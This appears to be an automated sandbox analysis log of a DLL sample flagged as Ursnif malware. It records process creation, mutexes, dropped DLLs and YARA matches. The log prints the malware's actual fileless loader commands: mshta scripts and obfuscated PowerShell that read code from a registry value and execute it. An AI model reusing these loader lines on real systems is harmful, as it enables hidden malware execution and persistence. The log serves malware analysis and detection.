Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
PE / OLE file has an invalid certificate
Source: 6.dll Static PE information: invalid certificate
Source: 6.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
Source: classification engine Classification label: mal100.troj.evad.winDLL@59/52@16/4
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F13309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 4_2_00F13309
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 6.dll Static file information: File size 1781920 > 1048576
Source: 6.dll Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1B073 push ecx; ret 4_2_00F1B083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1E97E pushad ; iretd 4_2_00F1E982
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1AD40 push ecx; ret 4_2_00F1AD49
PE file contains an invalid checksum
Source: 6.dll Static PE information: real checksum: 0x1ba6ec should be: 0x1b8278
Source: nigogz4l.dll.33.dr Static PE information: real checksum: 0x0 should be: 0xee8b
Source: dtnsoflb.dll.43.dr Static PE information: real checksum: 0x0 should be: 0x4b02
Source: nlbomp32.dll.35.dr Static PE information: real checksum: 0x0 should be: 0xf45d
Source: uu5u2nmv.dll.40.dr Static PE information: real checksum: 0x0 should be: 0xa363
Source: wklr4juq.dll.36.dr Static PE information: real checksum: 0x0 should be: 0x1029d
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
